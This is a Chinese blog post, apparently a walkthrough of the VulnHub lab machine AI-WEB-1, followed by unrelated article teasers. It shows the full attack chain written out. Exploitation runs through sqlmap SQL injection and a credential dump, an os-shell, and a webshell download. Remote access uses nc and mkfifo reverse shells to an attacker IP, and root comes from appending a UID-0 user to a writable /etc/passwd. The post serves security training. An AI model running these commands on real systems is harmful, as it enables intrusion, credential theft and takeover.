AI-WEB-1 vulnhub靶场

news2024/11/23 2:34:21

AI-WEB-1

在这里插入图片描述

端口扫描

仅开放80端口

在这里插入图片描述

访问80端口

啥也没有

在这里插入图片描述

目录扫描

在这里插入图片描述

查看robots.txt

发现两个新目录
在这里插入图片描述

Disallow: /m3diNf0/
Disallow: /se3reTdir777/uploads/

全都无权限访问

在这里插入图片描述

加入路径后再次扫描目录

发现/m3diNf0/目录下存在info.php/se3reTdir777/目录下存在index.php

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

info.php是php配置文件,字太多暂时放一放

在这里插入图片描述

index.php有输入框,输入数字可查看用户信息,顺理成章想到sql注入

在这里插入图片描述

输入``时发现报错,直接上sqlmap

在这里插入图片描述

bp截获数据包,写入1.txt

在这里插入图片描述

sqlmap -r 1.txt -p uid

发现注入点

在这里插入图片描述

最后发现两个表usersystemUser
user表没用

在这里插入图片描述

sqlmap -r 1.txt -p uid -D aiweb1 -T systemUser -C username,password --dump

systemUser表内有password

在这里插入图片描述

看上去像base64,最后只有aiweb1pwn解出来了

在这里插入图片描述

MyEvilPass_f908sdaf9_sadfasf0sa

本来想ssh,才想起来没开放22端口

暂时没想到这个密码有什么用,先放一放

直接使用sqlmap开一个终端

sqlmap -r 1.txt -p uid --

os-shell需要一个写入目录,未知,回头看info.php
在这里插入图片描述

发现网站本地目录为/home/www/html/web1x443290o2sdf92213

os-shell需要一个上传文件的地方,于是刚好有/se3reTdir777/uploads/

连起来就是/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

在这里插入图片描述

直接反弹shell没成功,写入蚁剑反弹脚本

在攻击机上开启http服务

在这里插入图片描述

os-shell远程下载反弹shell脚本

在这里插入图片描述

蚁剑连接成功

在这里插入图片描述

蚁剑反弹shell

bash -i 没成功

在这里插入图片描述

改用nc -e /bin/bash 192.168.181.129 1234
在这里插入图片描述

发现不能使用-e参数

搜索后发现可以通过创建管道绕过-e参数

rm /tmp/f

mkfifo /tmp/f

 cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.181.129 1234 >/tmp/f

cat /tmp/f读取管道里的内容;/bin/sh -i 2>&1以交互方式运行/bin/sh,并将标准错误重定向到标准输出;nc ip port > /tmp/f连接 ip:port
并将输出重定向到/tmp/f。

这条命令的逻辑是这样的:cat /tmp/f等待并从命名管道中获取命令,然后将获取到的命令通过匿名管道发送到/bin/sh执行,然后/bin/sh将返回的结果再通过匿名管道发送给ncnc则将命令的结果发送到
ip:port ,如果 ip:port 再次输入的命令,那么这个命令被nc接收后会被重定向到/tmp/f

记得事先在攻击机开启监听

nc -lvnp 1234

在这里插入图片描述

查看用户目录,发现aiweb1,和刚刚数据库里查出来的用户吻合

在这里插入图片描述

su aiweb1

可惜没成功

在这里插入图片描述

上传linpeas.sh

curl http://192.168.181.129:8888/linpeas.sh -o linpeas.sh

执行

发现/etc/passwd可以任意写

在这里插入图片描述

创建一个用户写入

openssl passwd -1 -salt cccc 123456

echo 'cccc:$1$cccc$86ybZ4sfCXVS9DhweUEVb.:0:0::/root:/bin/bash' >> /etc/passwd

成功提权

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1789261.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

HTML动态爱心

写在前面 本文主要是对某音爆火的html爱心代码做简单的解析,需要代码文末自取哦~ HTML入门 HTML(Hypertext Markup Language)是一种标记语言,用于创建网页。它由一系列的标签组成,这些标签可以告诉浏览器如何显示网…

先进工艺的DPT技术

“2.5GHz频率 hierarchy DVFS低功耗A72培训” 2.5GHz 12nm 景芯A72 upf DVFS 后端实战训练营!随到随学! 课程采用hierarchy/partition flow,先完成单核A72实战,然后完成A72 TOP实战!训练营简介: Instance&a…

斯坦福抄袭清华、面壁智能大模型,当事人已道歉、删项目

6月4日,两名斯坦福大学生Aksh Garg和Siddharth Sharma,承认抄袭清华和面壁智能联合开发的MiniCPM-Llama3-V2.5(以下简称V2.5)多模态大模型事件,并在社交平台公开道歉、删掉开源项目。 该抄袭事件也得到了斯坦福大学AI…

【计算机毕业设计】302微信小程序的充电桩管理系统

🙊作者简介:拥有多年开发工作经验,分享技术代码帮助学生学习,独立完成自己的项目或者毕业设计。 代码可以私聊博主获取。🌹赠送计算机毕业设计600个选题excel文件,帮助大学选题。赠送开题报告模板&#xff…

「漏洞复现」用友NC pagesServlet SQL注入漏洞(XVE-2024-13067)

0x01 免责声明 请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删…

LangChain Agent 最新教程详解及示例学习

LangChain Agent的终极指南,本教程是您使用 Python 创建第一个agent的重要指南,请立即开始你的 LLM 开发之旅。 一、什么是LangChain Agent(代理) LangChain中代理背后的想法是利用语言模型以及要执行的一系列操作。代理正在使用…

`THREE.BufferGeometry` 是 Three.js 中一个强大的类,用于表示几何体数据。

demo案例 THREE.BufferGeometry 是 Three.js 中一个强大的类,用于表示几何体数据。与传统的 THREE.Geometry 类相比,它使用缓冲区来存储顶点数据,从而在性能上有显著的提升。以下是 THREE.BufferGeometry 的详细说明,包括其输入参…

ARM服务器在云手机中可以提供哪些支持

ARM服务器作为云手机的底层支撑,在很多社媒APP或者电商APP平台都有着很多看不见的功劳,可以说ARM扮演着至关重要的底层支持角色; 首先,ARM 服务器为云手机提供了强大的计算能力基础。云手机需要处理大量的数据和复杂的运算&#x…

Sentinel不使用控制台基于注解限流,热点参数限流

目录 一、maven依赖 二、控制台 三、基于注解限流 四、热点参数限流 五、使用JMeter验证 一、maven依赖 需要注意,使用的版本需要和你的SpringBoot版本匹配!! Spring-Cloud直接添加如下依赖即可,baba已经帮你指定好版本了。…

沃尔玛、美客多跨境平台自养号全攻略:防关联环境系统搭建与养号技巧

在沃尔玛、美客多等跨境平台进行自养号的过程中,环境系统的选择和账号的养育是至关重要的。以下是我对这两个方面的经验和技巧的总结: 环境系统: 市面上有很多环境系统可供选择,但质量参差不齐。为了实现足够高的伪装度&#xff…

服务器数据恢复—raid5阵列上分配的卷被删除后重建如何恢复被删除卷的数据?

服务器存储数据恢复环境: 某品牌FlexStorage P5730服务器存储,存储中有一组由24块硬盘组建的RAID5阵列,包括1块热备硬盘。 服务器存储故障: 存储中的2个卷被删除,删除之后重建了一个新卷。需要恢复之前删除的一个卷的数…

高舒适性气膜网球馆的注意事项—轻空间

气膜网球馆以其高舒适性、智能恒温等特点,成为现代体育场馆的新宠。在国家提倡全民健身的背景下,各地气膜网球馆如雨后春笋般涌现。然而,在建设和使用气膜网球馆时,需要特别注意以下几点: 1. 避免随意拆装 气膜网球馆…

Three.js——tween动画、光线投射拾取、加载.obj/.mtl外部文件、使用相机控制器

个人简介 👀个人主页: 前端杂货铺 ⚡开源项目: rich-vue3 (基于 Vue3 TS Pinia Element Plus Spring全家桶 MySQL) 🙋‍♂️学习方向: 主攻前端方向,正逐渐往全干发展 &#x1…

[数据集][目标检测]剪刀石头布检测数据集VOC+YOLO格式1973张3类别

数据集格式:Pascal VOC格式YOLO格式(不包含分割路径的txt文件,仅仅包含jpg图片以及对应的VOC格式xml文件和yolo格式txt文件) 图片数量(jpg文件个数):1973 标注数量(xml文件个数):1973 标注数量(txt文件个数):1973 标注…

SpringBoot接口防抖(防重复提交)

SpringBoot接口防抖(防重复提交) 概念 Spring Boot接口防抖(Debouncing)的概念是指在处理请求时,通过一定的机制来防止用户频繁触发同一接口请求,以防止重复提交或频繁请求的情况发生。 在Web应用中&…

Jupyter Notebook 切换虚拟环境

具体流程: 1. 查看当前jupyter notebook的环境: 从上面可看出当前jupyter只有一个python 3的环境。 2、 在终端中切换至想要添加的环境: 2.1 激活你要添加的环境 conda activate sf 2.2 在当前环境中安装ipykernel conda install ipyke…

手把手教你【如何使用Vue3+Spring Boot实现一个视频点播功能】

一、简介 本项目是一个实际的视频点播应用,采用了Vue3和Spring Boot作为主要技术栈。旨在帮助开发者通过学习和参考实现思路来掌握相关知识。它主要解决了阿里云视频点播服务的接入、视频基础信息管理以及上传视频后获取视频ID等关键流程,涉及前后端交互…

【最新支持】OpenCV实验大师C++ SDK支持YOLOv10了推理了

学习《OpenCV应用开发:入门、进阶与工程化实践》一书 做真正的OpenCV开发者,从入门到入职,一步到位! OpenCV实验大师C SDK YOLO系列模型推理SDK 支持 YOLOv5、YOLOv8、YOLOv10系列网络从推理与部署 基于OpenCV DNN 与OpenVINO实…

Echarts 在指定部分做文字标记

文章目录 需求分析1. demo12. demo22. demo3 定位解决需求 实现在Echarts的折线图中,相同Y值的两点之间显示’abc’ 分析 1. demo1 使用 ECharts 的 markLine 功能来在相邻两个点之间添加标记。其中,我们通过设置标记的 yAxis 和 label 来控制标记的位置和显示内容。最后…

前端 CSS 经典:3D Hover Effect 效果

前言&#xff1a;有趣的 3D Hover Effect 效果&#xff0c;通过 js 监听鼠标移动&#xff0c;动态赋值 rotateX&#xff0c;rotateY 的旋转度来实现。 效果图&#xff1a; 代码实现&#xff1a; <!DOCTYPE html> <html lang"en"><head><meta …